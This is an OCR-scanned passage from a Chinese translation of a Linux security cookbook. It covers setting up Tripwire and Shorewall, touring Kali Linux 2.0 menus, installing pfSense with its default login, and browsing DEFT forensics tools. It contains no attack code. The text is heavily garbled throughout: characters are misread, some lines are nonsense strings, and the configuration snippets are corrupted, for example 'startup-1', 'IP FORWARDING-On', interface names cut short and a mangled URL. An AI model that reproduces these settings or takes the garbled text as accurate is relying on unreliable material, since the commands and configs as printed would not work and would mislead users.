在 本 次 测试 中 ， 前 面 的 截图 中 显示 tripwire_testing 文 件 被 添加 到 了 /root 目 录 下 。 


如 果 想 保存 屏幕 中 显示 的 变化 信息 ， 只 需 保存 在 编辑 器 中 自动 打开 的 检测 结果 文件 即 可 。 保 存 检测 结果 文件 时 ， 会 提示 输入 
本 地 密码 ， 需 要 用 户 输入 安装 Tripwire 时 设置 的 密码 。 


16. 最 后 ， 在 crontab 添 加 一 个 条 目 ， 以 自动 运行 Tripwire 来 检测 文件 /目录 的 变化 情况 。 在 任 一 编辑 器 中 打开 /etc/crontab 
文件 并 添加 下 图 所 示 的 文字 行 : 


/usr/sbin/tripwire --check 


38i JE aseo TripwireSA FB), SrXESSUEEFPARIRSSACEBUEECKIBUSYRIB, Sexo ripwirezuil. 


然后 ， 查 看 Tripwire 是 否 正 常 工作 。 首 先 ， 在 任 一 位 置 创 建新 文件 并 运行 Tripwire 交 互 命令 。 执 行 完毕 后 ， 看 到 检测 结果 中 
显示 添加 了 新 文件 。 这 表明 Tripwire 工 作 很 好 。 


最 后 ， 我 们 编辑 crontab 配 置 文件 ， 使 Tripwire 按 指定 周期 目 动 运行 。 


若 用 户 期 望 安装 Linux 系 统 作 为 小 型 网 络 的 防火 墙 ， 那 么 Shorewall 可 以 帮助 你 实现 这 个 愿望 。 用 户 可 利用 标准 的 Shorewall 
工具 来 配置 企业 级 防火 墙 。 


Shorewall 实 际 上 基于 iptables 开 发 ， 但 是 ， 相 对 于 iptables 来 说 ，Shorewall 配 置 起 来 更 简单 。 


配置 ?horewall 需 要 一 个 安 委 并 运行 两 块 网 卡 的 Linux 系 统 : 一 块 网 卡 作为 外 网 接口 ， 另 一 块 作 为 内 网 接口 。 在 下 面 的 例子 
中 ， 使 用 eth0 作 为 外 网 接口 ，eth1 作 为 内 网 接口 。 


根据 网 络 的 配置 来 设置 两 块 网 卡 。 用 户 需 要 确保 可 以 ping 通 局 域 网 内 的 其 他 系统 ， 也 可 以 ping 通 外 网 (因特网 ) 上 的 一 些 


在 本 地 系统 上 ， 我 们 将 安装 Shorewall 软 件 包 并 根据 需求 进行 配置 。 


1. 使 用 apt-get 命 令 在 本 机 系统 上 安 濠 Shorewall: 


root@mykerberos:~# apt-get install shorewall 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
Suggested packages: 
shorewall-doc 
The following NEW packages will be installed: 
shorewall 
© upgraded, 1 newly installed, © to remove and 332 not upgraded. 
Need to get 705 kB of archives. 
After this operation, 1,826 kB of additional disk space will be used. 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise/universe shorewall all 4.4.26 


.1-1 [785 kB] 

Fetched 705 kB in 3s (228 kB/s) 

Preconfiguring packages ... 

Selecting previously unselected package shorewall. 

(Reading database ... 144867 files and directories currently installed.) 
Unpacking shorewall (from .../shorewall 4.4.26.1-1 all.deb) ... 
Processing triggers for ureadahead .. 

Processing triggers for man-db ... 

Setting up shorewall (4.4.26.1-1) 


2 .安装 完成 后 ， 党 试 启 动 Shorewall， 会 显示 如 下 图 所 示 的 报错 消息 : 


rootâmykerberos:~-# /etc/init.d/shorewall start 
HHHH WARNING fHHHE 
The firewall won't be started/stopped unless it is configured 


Please read about Debian specific customization in 
/usr/share/doc/shorewall/README.Debian.gz. 
THEHIHBHHBEHHHE HB HB 

rootümykerberos :~# 


该 消息 提示 用 户 ， 在 开始 运行 Shorewall 前 需要 进行 配置 。 
3. 为 了 配置 Shorewall， 在 任 一 编辑 器 中 编辑 /etc/default/shorewall 文 件 。 碍 找 售 有 startup=0 的 文字 行 ， 按 下 图 所 示 修 改 


其 赋值 : 


# prevent startup with default configuration 
# set the following varible to 1 in order to allow Shorewall to start 


startup-1 


4. 下 一 步 ， 编 辑 /etc/shorewall/shorewall.conf 文 件 ， 查 找 含有 IP _ FORWARDING 的 文字 行 ， 检 查 其 赋值 是 否 为 On: 


IP FORWARDING-On 


5.Shorewall 的 配置 文件 位 于 /etc/shorewall 目 录 下 ，Shorewall 运 行 所 需 的 最 小 必 备 文件 集 如 下 所 示 : 


: Interfaces 
: Policy 

: Rules 

: Zones 


Shorewall 安 装 完成 后 ， 若 在 /etc/shorewall 目 录 下 缺少 上 述 任 一 文件 ， 可 以 在 /usr/share/doc/shorewall/default- 
config/ 目 录 下 查找 同名 文件 ， 将 其 复制 到 /etc/shorewall 目 录 下 。 


6. 如 下 图 所 示 编 辑 /etc/shorewalVinterfaces 文 件 ， 添 加 图 中 所 示 的 内 容 : 


TEHERETETERETERE ERE RE EEERHETERETEERERERETETE TIERE TETTE TER HEHEERETEETEHERERERE TEE EHE RE E EHE FEE HER E E NE 
#ZONE INTERFACE BROADCAST OPTIONS 
# 


net eth detect tcpflags,nosmurfs 
local  ethi detect 


上 图 所 示 的 配置 中 将 eth0 命 名 为 net， 将 eth1 命 名 为 local。 用 户 也 可 以 选择 其 他 名 字 ， 只 要 不 多 于 5 个 字符 即 可 。 


7. 下 一 步 ， 如 下 图 所 示 编 辑 /etc/shorewall/zones 文 件 ，Zone 主 要 用 来 设置 选择 使 用 ipv4 还 是 ipv6: 


FEHHHEHHHHHEHBEHHEHHEHHHBHHHBHERIHHBHHHHHBHHHHHHBHHPIHHHHEHHBHHHHHBHHHBHHBHHHBEI HE E E 
"ZONE TYPE OPTIONS IN OUT 
其 OPTIONS OPTIONS 


firewall 
ipv4 
ipv4 


在 上 图 所 示 的 配置 中 ，fw 表 示 Shorewall 防 火 墙 自身 。 后 面 两 行 表示 两 块 网 卡 均 支 持 ipv4。 
8. 下 面 编 辑 策 略 文 件 /etc/shorewall/policy， 该 文件 用 于 设置 什么 包 可 以 去 哪儿 的 策略 。 
该 文件 将 被 自 硕 向 下 逐 行 处 理 ， 并 按 下 列 格式 解析 : 


如 果 一 个 数据 包 是 从 AXES o 

BHEREHERERERERERERERHEHE HE I E FR EHE TETTE THE HHIHEHHHHEHE HE EE ER MH I HIGH EHE HE E RR HE RE E I E GG 

#SOURCE DEST POLICY LOG LIMIT: CONNLIMIT: 
LEVEL BURST MASK 


ACCEPT info 
ACCEPT info 


ACCEPT info 
ACCEPT info 


DROP info 


REJECT info 


在 本 例 中 ， 第 一 条 策略 的 含义 是 : 如 果 一 个 包 是 从 local 发 送 到 net， 就 接受 (人 允许) 该 包 。 


用 尸 可 根据 需求 按 上 述 方式 任意 添加 策略 ，Shorewall 防 火 墙 将 依据 这 些 策 略 运 行 。 


9. 最 后 ,编辑 /etc/shorewall/rules 文 件 ， 该 文件 用 来 创建 策略 之 外 的 异常 规则 。 这 些 规则 主要 用 于 允许 外 网 用 尸 访问 内 部 


SOURCE DEST PROTO DEST 
PORT 
net fw tcp 80 


上 面 的 示例 表示 添加 了 这 样 一 条 规则 ， 各 数据 包 从 net 发 送 到 fw， 使 用 TCP 协 议 ， 目 标 痛 口 为 80， 则 接受 该 包 。 


10. 用 尸 按 需求 完成 配置 后 ， 运 行 下 述 命令 测试 这 些 设置 ; 


shorewall check 


滚动 到 输出 结果 底部 ， 如 果 显 示 “shorewall configuration verified”， 表 明 设 置 正确 无 误 ， 到 这 一 步 Shorewall 束 可 以 作 


为 防火 墙 运行 了 。 


root@mykerberos:~# shorewall check 
Checking... 


Processing /etc/shorewall/shorewall.conf... 


Loading Modules... 
Checking /etc/shorewall/zones... 


Checking /etc/shorewall/interfaces... 


Determining Hosts in Zones... 
Action Files... 


/usr/share/shorewall/action. 
/usr/share/shorewall/action. 
/usr/share/shorewall/action. 
/usr/share/shorewall/action. 
/usr/share/shorewall/action. 


/etc/shorewall/policy... 


TCP Flags filtering... 
Kernel Route Filtering... 
Martian Logging... 


MAC Filtration -- Phase 1... 


/etc/shorewall/rules... 


MAC Filtration -- Phase 2... 


Policies... 
Shorewall configuration verified 


11. 运 行 下 述 命令 重启 Shorewall 服 务 ， 以 应 用 前 面 的 设置 : 


Drop for chain Drop... 

Broadcast for chain Broadcast... 
Invalid for chain Invalid... 
NotSyn for chain NotSyn... 
Reject for chain Reject... 


service shorewall restart 


原理 解析 


我 们 首先 在 系统 上 安装 Shorewall， 设 系统 上 有 两 块 网 卡 。 安 装 完成 后 ， 配 置 /etc/default/shorewall 文 件 


及 /etc/shorewall/shorewall.conf 文 件 。 


然后 ， 我 们 编辑 或 创建 /etc/shorewall 目 录 下 的 下 列 文件 : interfaces、policy、rules、zones， 并 根据 需求 给 每 个 文件 添 


加 相应 内 容 。 


编辑 完成 后 ， 我 们 检查 设置 是 否 正 确 ， 然 后 启动 Shorewall 服 务 以 运行 防火 墙 。 


本 章 将 讨论 如 下 主题 : 

- Kali Linux 

: pfSense 

- DEFT: 数字 证 据 及 取证 工具 包 
: NST: 网 络 安全 工具 包 


: Helix 


8.1 Kali Linux 


Kali 是 基于 Debian 的 Linux 发 行 版 ， 其 开发 的 目的 是 用 于 安全 测试 。Kali 预 装 了 数 百 个 渗透 测试 工具 ， 可 以 在 live CDI. U 
盘 或 虚拟 机 上 直接 运行 。 


目前 Kali 的 最 新 版 本 为 Kali 2.0， 该 版 本 进行 了 大 量 修改 ， 变 成 了 滩 动 升级 模式 。 用 户 仅 需 安 疼 Kali 2.0， 通 过 正 弟 升级 束 可 
获得 工具 的 最 新 版 本 。 这 意味 着用 户 不 用 等 到 Kali 2.1 友 布 束 能 获得 最 新 内 容 。 


准备 工作 


使 用 Kali 2.0 前 ， 需 要 从 官方 网 站 https//www.kaliorg/downloads/ 下 载 最 新 版 本 。 可 以 下 载 19O 了 映像 文件 并 刻录 到 
CD/DVD 上 或 创建 USB 启 动 盘 。 也 可 以 从 前 面 网 址 处 下 载 Kali Linux 的 VMWare、Virtual Box 或 ARM 虚拟 机 映像 。 


操作 指南 
Kali 2.0 的 主要 变化 体现 在 它 更 新 的 开 友 环境 及 工具 集 方面 ， 下 面 将 探讨 这 些 变化 以 理解 其 不 同 之 处 : 


1. 要 开始 使 用 Kali， 用 尸 可 以 安 闪 Kali 或 者 通过 live 选 项 使 用 它 。 当 通过 live 选 项 启动 时 ， 可 以 看 到 Grub 界 面 变 得 更 易 操作 


GNU GRUB wersion 2.02" beta2-35 


x*Kali GNU/Linux 
Advanced aptions for Kali-aMBzLinus 


ct uhich entru is highlighted. 


cted 0S8, e to edit the commands 
command-line. 


Use the WES keys to se 
Press enter to boot the se 


before booting or c' far 


E 
B 


l 
l 
a 


2.Kali 的 主要 系统 映像 被 迁移 到 了 GNOME 3， 并 重新 设计 了 用 户 界面 ， 在 登录 界面 中 就 可 以 发 现 变化 ， 该 界面 已 被 重新 设 
W. 


Username: 


3 EZ Jo B SRIBI USA ERG TIRE, TES SRTEDEESTAUT P IBS: 


Applications 


4. 单 击 元 上 角 的 “Applications” 时 ， 用 户 可 友 现 荣 单 和 工具 分 类 都 进行 了 重新 组 织 。 


Applications ™ Places * Tue 13:55 


Favorites Iceweasel 


01 - Information Gathering 
Terminal 
02 - Vulnerability Analysis 


03 - Web Application Analysis | x Files 


O4 - Database Assessment 
metasploit ... 

05 - Password Attacks 

: armitage 

O6 - Wireless Attacks 

07 - Reverse Engineering burpsuite 


08 - Exploitation Tools 
maltego 


09 - Sniffing & Spoofing 


10 - Post Exploitation ‘| beefxssfr.. 


11 - Forensics faraday IDE 


12 - Reporting Tools 
Leafpad 
13 - Social Engineering Tools 
14 - System Services Tweak Tool 


Usual applications 


5. 也 可 以 通过 单 击 工 具 条 底部 的 “Menu” 图 标 访问 这 些 工 具 ， 这 样 可 以 一 下 子 看 见 所 有 的 工具 : 


creepy 


Frequent 


6.Kali 包 含 内 置 的 录 屏 选项 ， 该 选项 实际 上 是 GNOME 3 的 一 部 分 。 在 右上 角 单 击 “recorder” 图 标 ， 将 显示 “start 
recording” 选 项 。 用 户 仪 需 单 击 一 下 ， 就 可 以 开始 录 屏 。 


Start recording 


& No audio source 
«^ Record all desktop 


C) No delay in the registration 


AE Options 


7. 如 果 需 要 访问 Kali 的 “Settings” 菜 单 ， 我 们 会 友 现 在 “Application” 菜单 里 没有 此 选项 。 为 此 ， 单 击 右 上 和 角 
的 “Power” 图 标 会 弹出 一 个 菜单 ， 该 菜单 最 下 面 左 侧 的 图 标 就 是 “Settings” 图 标 : 


«) e 


Wired Connected 
Proxy None 
Mot In Use 


root 


9 


8. 当 单 击 上 一 步 中 的 “settings” 图 标 时 ， 将 显示 如 下 图 所 示 的 设置 荣 单 ， 用 户 可 根据 需求 修改 系统 设置 。 


Applications ™ 


Personal 


Background 


Hardware 


Bluetooth 


System 


© 


Date & Time 


请 单 击 “Details” 按 钮 ， 查 看 Kali 2.0 更 多 的 详情 。 


9. 下 图 显示 了 系统 的 详情 ， 包 括 GNOME 的 版 本 信息 。 


Places ~ — 2€ Settings v 


Notifications 


Color 


Printers 


Details 


O 


Online 
Accounts 


Sound 


Sharing 


Tue 14:11 


All Settings 


Privacy 


Nu 后 


Keyboard 


Wacom Tablet 


Universal 


Access 


Region & 
Language 


a 
Mouse & 
Touchpad 


Users 


Search 


Network 


UO 


GNOME 


Version 3.18.2 


kali 


1005. / MIB 

Intel” Core"2 Duo CPU T6670 @ 2.20GHz 
Gallium 0.4 on SVGA3D: build: RELEASE: LLVM: 
Kali GNU/Linux Rolling 32-bit 

VMware 

30.2 GB 


Check for updates 


若 用 户 和 希望 升级 Kali， 只 需 企 Details 窗 口中 单 击 “Check for updates” 按 钮 即 可 。 


10. 在 弹出 的 提示 框 中 ， 选 择 "Continue Anyway” 按 钮 将 继续 查看 升级 ， 选 择 "Cancel" 按钮 则 取消 升级 。 


Package Updater is running as a privileged user 


Package management applications are security sensitive. 
Running graphical applications as a privileged user should be avoided 
for security reasons. 


11. 若 系统 已 是 最 新 版 本 ， 将 显示 下 图 中 所 示 的 消息 ， 否 则 可 以 下 载 可 用 的 升级 。 


All packages are up to date 


There are no package updates available for your computer at this time. 


原理 解析 


当 启 动 Kali 2.0 时 ， 我 们 太 现 果 面 已 更 改 ， 屏 幕 左 侧 有 一 个 工具 条 方便 快捷 地 访问 应 用 。 


屏幕 左上 角 的 “Application” 荣 单 包 含 了 不 同类 型 的 所 有 工具 ， 用 户 也 可 以 使 用 工具 条 底部 的 “Menu ”图标 来 访问 这 些 
应 用 。 


接着 我 们 介绍 了 Kali 2.0 内 置 的 录 屏 工具 ， 可 从 右上 和 角 的 菜单 访问 该 工具 。 该 菜单 上 还 有 访问 系统 设置 菜单 的 选项 。 
然后 我 们 介绍 了 查看 系统 升级 信息 的 选项 ， 该 选项 用 于 保证 Kali 是 最 新 的 。 
Kali 2.0 包 含 了 升级 工具 ， 该 工具 每 天 4 次 从 Debian 下 拉 更 新 ， 以 确保 系统 处 于 最 新 状态 ， 同 时 确保 实现 常规 的 安全 升级 。 


[1] live 系 统 ， 又 称 自生 系统 ， 是 事先 存储 在 CD、USB 等 可 移动 设备 上 ， 不 需要 安装 到 计算 机 硬盘 ， 不 依赖 于 特定 计算 机 硬件 而 局 
译 者 注 


动 的 系统 。 包 括 live CD. live DVD. live USB 等 。 


8.2 pfSense 


对 网 络 管 理 员 来 说 ， 安 闪 防 火 墙 和 路 由 器 是 基本 任务 。 关 于 防火 墙 的 安 竣 ,可 简单 地 安 北 市场 上 预先 配置 好 的 防火 墙 ， 或 建 
立 目 己 的 防火 墙 系 统 。 


pfSense 是 一 款 基 于 FreeBSD、 为 用 作 防 火 墙 而 定制 的 开源 Linux 版 本 ， 可 通过 Web 界 面 轻松 实现 防火 墙 的 党 理 。 


首先 ， 从 下 面 链接 中 下 载 pf9ense: 


注意 ， 要 根据 你 的 需求 选择 对 应 的 计算 机 架构 和 平台 。 下 载 完 成 后 ， 将 ISO 映像 文件 刻录 到 CDVDVD 上 或 创建 可 局 动 的 live 
USB 盘 。 安 装 并 配置 pfSense 的 Linux 系 统 需要 装 有 两 块 网 卡 。 


为 了 在 系统 上 建立 和 配置 防火 墙 ， 需要 按照 下 列 步 又 安 痰 并 配置 pfSense。 


1. 当 从 CD/DVD 或 USB 设 备 启动 pfSense 时 ， 会 出 现下 图 所 示 的 启动 界面 : 


elcome to pfSense 


Boot Multi User [Enter]! 


Boot I[Slingle User 
[Esclape to loader prompt 
Reboot Sense 


Options: 
5. [K]ernel: kernel (1 of 2) 
b. Configure Boot I[Ü0lIptions... 


按 下 <6> 键 配置 启动 选项 。 
2. 在 下 一 界面 中 ， 仍 然 选 <6> 查 看 详情 ， 然 后 按 <1> 返 回 之 前 的 界面 。 
当 返 回 到 之 前 界面 后 ， 按 下 <Enter> 键 局 动 pfSense。 


3.pfSense 开 始 启 动 ， 启 动 过 程 中 将 显示 下 图 所 示 的 界面 : 


[ Press R to enter recovery mode or ] 
[ press I to launch the installer |] 


(R)ecouvery mode can assist by rescuing config. xml 
from a broken hard disk installation, etc. 


(I)nstaller may be invoked nou if you do 
not wish to boot into the liveCD environment at this time. 


(C) continues the LiveCD bootup without further pause. 


Timeout before auto boot continues (seconds): 9 


按 下 <1> 键 选择 安 半 pfsense。 各 在 20 秒 内 没有 进行 选择 ， 则 目 动 以 Live CD 方式 司 动 。 


4. 下 一 步 进 入 Configure Console 界 面 ， 用 于 配置 控制 合 ， 选 择 "Accept these settings" 选项， 然后 按 下 <Enter> 键 继 


1N 
Z 
T 


5. 在 下 一 界面 中 ， 用 户 若 首次 使 用 pfSense， 则 选择 “Quick/Easy Install”， 人 否则 选择 “Custom Install" , JERRI 
中 设置 更 多 高 级 选项 。 


6. 单 击 OK 继 续 安 丢 ， 安 妆 过 程 正 式 开 始 。 


7. 在 安 闻 过 程 中 ， 将 要 求 用 户 选 择 安 委 哪个 内 核 配置 。 用 户 和 奉 在 梨 面 或 个 人 电脑 上 安装 pfSense， 则 选择 "Standard 
Kernel”。 若 在 黄 入 式 平 台 上 安装 ， 如 在 路 由 器 板 上 安 沪 ， 则 选择 “Embedded kernel" , 


8.1 选 择 完成 后 安装 继续 。 完 成 后 ， 选 择 “Reboot” 并 按 下 <Enter> 键 完成 安 六 。 


9. 在 重 局 过 程 中 ， 会 显示 pfS9ense 的 默认 用 户 名 及 口令 ， 如 下 图 所 示 : 


*DEFAULT lsernamex: admin 
xlnEFAULT Passwuord*: pfsense 


Rebooting in 5 seconds. CTRL-C to abort. 


10. 重 启 后 ， 需 要 根据 网 络 配 置 设置 了 网卡。 两 块 网 卡 的 名 称 如 下 图 所 示 ， 可 根据 用 尸 喜 好 进行 更 改 。 


Ualid interfaces are: 


leB HB:B8c:298:b1:94:5c (up) 
lei HB :H8c:28:b1:984:b56 (up) 


11. 现 在 ， 系 统 将 询问 用 户 是 否 立 刻 建 YYVLAN? 键入 <n> 选 择 拒绝 。 
12. 然 后 ， 需 要 输入 连接 外 网 的 网 卡 名 称 ， 在 本 书 的 示例 中 ， 外 网 网 卡 是 le0。 请 根据 网 络 配置 输入 对 应 的 名 称 。 


下 一 步 ， 输 入 连接 局 域 网 的 网 卡 名 称 ， 本 例 中 是 le1。 


Enter the WAN interface name or 'a' for auto-detection 
(le lei or a): leH 


Enter the LAN interface name or aa for auto-detection 
NOTE: this enables full Firewalling NAT mode. 
(le1 a or nothing if finished): leif 


然后 ， 按 下 <Y> 键 继续 设置 。 


13. 网 卡 设置 完毕 后 ， 将 显示 如 下 图 所 示 的 pfSense 菜 单 : 


x¥¥ Helcome to pfSense 2.2.6-RELEASE-cdrom (i386) on pfSense »*x*x 
HAN Can) -> le -» v4- DHCP4: 192.1686.1.181724 


LAN (lan) -> lel 
Logout (SSH only) 9) pfTop 
Assign Interfaces 18) Filter Logs 
oet interface(s) IP address 11) Restart mnebConfigurator 
Reset uebÜConfigurator passmord 12) pfSense Developer Shell 
Reset to factory defaults 13) Upgrade from console 
Reboot system 14) Enable Secure Shell (sshd) 
Halt system 15) Restore recent configuration 


Ping host 15) Restart PHP-FPM 
shell 


Install pfSense to a hard drive, etc. 


Enter an option: D 


14. 如 果 到 目前 为 止 外 网 网 卡 和 内 网 网 卡 的 IP 地 址 还 没 正确 设置 ， 那 么 可 在 前 面 的 菜单 中 选择 2 进行 手动 |P 设 置 。 


15. 选 择 待 配置 的 网 卡 并 为 其 设置 |P 地 址 : 


Enter an option: 2 
Available interfaces: 


1 - WAN (leB - dhcp, dhcpb) 
2 — LAN (lei - static) 


Enter the number of the interface you MISh to configure: 


Configure IPud address WAN interface via DHCP? (y^n) n 


Enter the nen HAN IPy4 address. Press «ENTER? for none: 
> 192.158.1.114 


16. 下 一 步 ， 输 入 子 网 位 数 及 默认 网 天 : 


Enter the nen WAN IPud subnet bit count (1 to 31): 
» 24 


For a HAN, enter the nen HAN IPud upstream gateway address. 
For a LAN, press «ENTER? for none: 
> 192.168.1.1] 


17. 内 网 网 卡 的 设置 步骤 同 外 网 网 卡 。 设 置 完成 后 ， 屏 幕 上 会 显示 一 个 链接 地 址 ， 通 过 该 地 址 可 访问 pfSensed 的 Web 配 置 界 
H. 


The IPud LAN address has been set to 192.168.1.115724 
You can noH access the NebLoni Idgurator by opening the following URL in your meb 
browser: 

http:77192. 158. 1.1157 


在 本 示例 中 ， 链 接地 址 为 http://192.168.1.115。 
18. 在 局 域 网 内 部 的 某 个 系统 上 使 用 任 一 种 浏 哎 器 访问 前 述 地址， 连接 后 将 显示 如 下 图 所 示 的 登录 界面 : 


El» Google Q A 


@ 192.168.1.115 "© 


AAAS 
k M A 


| - s 
. WT a m 
! 0 " " p Le 
4 ^. ™ E y D ^ B Nur eut E P 2 E 
a1. WVL 3 v B1 ` "l E FREE 
E Y " 3 h.c WM, to ow - PCA 
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Login 


输入 默认 用 户 名 admin 及 默认 口令 pfsense 并 登录 。 登 录 后 可 修改 用 户 名 及 口令 。 


19. 成 功 登录 后 ， 将 显示 pfSense 的 主 界面 : 


(€ © 1921681115 d o EELLZ 
oe. Li; System i Interfaces m Firewall H Services " » VPN d Status | t Diagnostics ] » Gold * Help sje pfSense.lo 
Status: Dashboard 2 


System Information [-] Interfaces [-] 
Name pfsense.localdomain 


autoselect 
Version 2.2.6-RELEASE (i386) 192.168.1.114 


built on Mon Dec 21 14:50:36 CST 2015 
FreeBSD 10. 1-RELEASE-p25 


You are on the latest version. 
Platform cdrom 
Intel(R) Core(TM)2 Duo CPU T6670 @ 2. 20GHz 


CPU Type Current: 275 MHz, Max: 2201 MHz 

Uptime 01Hour Q0 Minute 38 Second 

Current ! suaa 

date/time Mon Feb 8 17:21:35 IST 2016 
127.0.0.1 

server(s) 


原理 解析 


我 们 从 pfSense CD/VDVD 局 动 并 选择 在 本 机 上 安 妆 该 操作 系统 。 


局 动 过 程 中 选择 选项 “| ” ， 然 后 选择 "Quick/Easy Install” 开 始 安装 pfSense。 安 痿 完成 后 ， 我 们 对 两 块 网 卡 进 行 配置 。 
第 一 块 网 卡 依据 外 网 环境 进行 配置 ， 选 择 菜 单 中 的 “Set interface IP address" 选项 ， 然 后 设置 |P 地 址 、 子 网 位 数 及 默认 网 关 
地 址 。 


配置 完成 后 ， 从 内 网 上 某 个 系统 的 任 一 种 浏览 器 通过 访问 内 网 网 卡 的 IP 地 址 来 访问 pfsense 的 网 络 界面 ， 并 根据 需求 配置 路 
由 器 /防火 墙 。 


8.3 DEFT: 数字 证 据 及 取证 工具 包 

进行 计算 机 取证 时 ， 取 证 软件 必须 保证 文件 结构 的 完整 性 ， 这 点 非常 重要 。 同 时 要 求 取 证 软件 可 在 不 替换 、 删 除 或 更 改 数据 
的 情况 下 分 析 被 取证 系统 。 

DEFT 是 一 款 基 于 Lubuntu 的 计算 机 取证 软件 ， 其 中 Lubuntu 是 Ubuntu 的 派生 版 。 
准备 工作 

DEFT 可 从 下 面 链接 中 下 载 : 


http://www.deftlinux.net/download/ 


下 载 完 毕 后 ， 将 1SO 映 像 文 件 刻录 到 CD/DVD 上 或 创建 live USB 局 动 盘 。 


操作 指南 
使 用 DEFT 前 ， 首 先 概 哆 下 该 系统 中 包含 的 内 容 : 


1. 启 动 DEFT CD/DVD 或 live USB 后 ， 将 看 到 局 动 界 面 。 首 先 需 要 选择 语言 ， 完 成 后 或 者 选择 以 live 方 式 运行 DEFT， 或 在 系 
统 上 安装 DEFT。 


2. 在 本 例 中 ， 选 择 直 接 运 行 DEFT。 局 动 完成 后 ， 将 显示 主 界面 。 
3. 下 面 了 解 一 人 DEFT 提 供 的 工具 集 。 


4. 在 start 菜 单 中 ，DEFT 的 第 1 个 子 菜单 包含 一 系 询 的 分 析 工 具 。 


d Autopsy 

图 Bulk Extractor 

国 Bulk Extractor GUI 
^ Catfish File Search 
融 DFF 

Dumpy 

File Manager | A Dumpzilla 
Emuleforensic 
Esedbexport 


LXTerminal evidence 


lij Accessories P Findwild 
P oie 
IE Graphics p si Antimalware b uino | 
B internet p 7$ Data Recovery b B Log2TimeLine 
office » -& Hashing b Lslnk 
lll Programming p £ Imaging > B Mhonarc 
E service p 8 Mobile Forensics 上 Outguess 
lll Sound & video p w Network Forensics b B Pasco 
Wine p 5$ OSINT b B Readdbx 
9 Password recovery p B Readpst 
图 System Tools P^ **Reporting tools p X Recoll 
H Preferences b Disks 图 Regripper 
-— 图 File Manager PCManFM Rifiuti 2 
c3 GParted 图 nifiuti-Vista 
c Logout © Midnight Commander Skype extractor 


m TA [] -— 二 MountManager 一 一 | -一 - 


5.DEFT 的 第 2 个 子 菜单 包含 了 所 有 的 反 有 恶意 软件 工具 。 


Accessories 
DEFT 

IP Graphics 

Internet 

Office 

i Programming 

Č Service 

H sound & Video 

国 wine 


" TY 


System Tools 
Col Preferences 


wo F wo cw Y YT Y Y F 


Run 


C Logout 


minele 


* saar iia 


B apktool 


$% Data Recovery 

-& Hashing 

£ Imaging 

B Mobile Forensics 

i Network Forensics 

2&5, OSINT 

e Password recovery 

** Reporting tools 

i Disks 

5 File Manager PCManFM 
| GParted 

© Midnight Commander 
— MountManager 


6.DEFT 的 第 3 个 子 菜单 是 数据 恢复 工具 集 


Accessories 
DEFT 

IP Graphics 

Internet 

Office 

i Programming 

Č Service 

Bl Sound & Video 

Ø wine 


System Tools 
is: Preferences 


wr F T own Y Y FY F 


Run 


c Logout 
minele 


7.DEFT 的 第 4 个 子 菜单 包括 一 


*. Analysis 
la Antimalware 


-& Hashing 

*- Imaging 

B Mobile Forensics 

i Network Forensics 

#4 OSINT 

e Password recovery 

** Reporting tools 

iJ Disks 

5 File Manager PCManFM 
I| GParted 

Q Midnight Commander 
二 MountManager 


| 国 Chkrootkit 
b Æ ClamTk Antivirus 
b JD Gui 


hk B Pdfparser 
hk B Rkhunter 


= Data Recovery 图 Foremost 


图 Myrescue 

kh B Photorec 

hk B Photorec sorter 
hk B Testdisk 

4 


d 
d 


系列 不 同 的 哈 希 工具 ， 可 用 于 检查 和 比较 任 一 文件 的 哈 希 值 。 


Accessories 


IP Graphics 
Internet 
Office 

i Programming 
© Service 

B Sound & Video 
圆 wine 


System Tools 
I Preferences 


Run 


C Logout 


"F B d 


wr F wo ow Y YT YT Y F 


min|e[- 


*. Analysis b 
M Antimalware 4 
© Data Recovery g ^4 
gj Dhash2 
£ Imaging kh B Mdsdeep 
B Mobile Forensics hk 图 Mdssum 
w Network Forensics hk B shaldeep 
21, OSINT k B shalsum 
e Password recovery bp B Sha256deep 
** Reporting tools k B sha256sum 
S Disks 图 Sha512deep 
5 File Manager PCManFM 图 Ssdeep 


| GParted 
© Midnight Commander 
l MountManager 


8.DEFT 的 第 5 个 子 菜 单 包括 映像 工具 。 在 法 律 调查 过 程 中 ， 可 用 这 些 工 具 对 竺 调查 系 统 盘 创建 映像 。 


Accessories 


E Graphics 
Internet 
office 

i Programming 
© Service 

H sound & Video 
Wine 


System Tools 
I Preferences 


Run 


c Logout 


m de] 


"FA ad 


wr cw T wn Y YT YT Y F 


*. Analysis p 

E Antimalware 4 

7$ Data Recovery F 

-& Hashing P B Cyclone 
B oc 

8 Mobile Forensics k 国 Dcfldd 

i Network Forensics hk B Ddrescue 
#4 OSINT hk B Dd rescue 

9 Password recovery bp S Dhash2 
** Reporting tools hk B Dislocker 
i| Disks 图 Esximager 
局 File Manager PCManFM EB EwfMount 
图 GParted B Guymager 
© Midnight Commander 国 vmdkmnt 
, 和 MountManager 国 Xmount 


9. 发 布 的 DEFT 7 中 ， 加 入 了 移动 设备 分 析 工 具 。 可 以 在 DEFT 的 子 菜单 “Mobile Forensics” FEI: 


ll] Accessories 


DEFT *. Analysis b 
I Graphics M Antimalware 4 
"hm 7$ Data Recovery b 
n— -& Hashing + 
E Programming ? " L2 
Ó Service 国 adb 
lll Sound & video w Network Forensics 图 apktool 
— p 44 OSINT b I BitPim 
LL Password recovery hk 图 Fastboot 
System Tools P = Reporting tools hb B iDevice Backup 2 
而 Preferences b Disks i ipddump 
DE 图 File Manager PCManFM 图 iPhone Backup Analyzer 
LL | Bj aParted 图 sqlite3 
G =i © Midnight Commander E SQLite database browser 


mr [7] .&.. 外 MountManager 


10.DEFT 的 第 7 个 子 荣 单 包括 网 络 取证 工具 。 


ll] Accessories b pem 
*. Analysis 
J rar " Antimalware 
—I b = Data Recovery 
office b e. hasain 
i Programming p| eng 
2 Service p B Mobile Forensics 
Ë Sound & Video WI 9 Network Forensics 3 Œ capAnalysis 
B wine p 2 OSINT hk B Nmap 
昌 Password recovery hk Bi wireshark 
System Tools P = Reporting tools Œ xplico 
ij Preferences b Š] Disks 
on 局 File Manager PCManFM 
C$ GParted 
& Logout Q Midnight Commander 


mita .& lä MountManager 
KoB Tin 


11.DEFT 的 子 菜单 “OSINT” 包括 了 开源 的 情报 获取 工具 。 


Accessories g 
SEET p *. Analysis b 

IE Graphics " " Antimalware b 

—— «E. Data Recovery 4 

Office P E hashing , 

ii) Programming > = Imaging , 

Z Service p B Mobile Forensics J 

lll Sound & video p u Network Forensics b | 

Wing p G Anonymouse Website 
ə Password recovery b C Creepy 

System Tools P ^ - Reporting tools d Google Chrome 

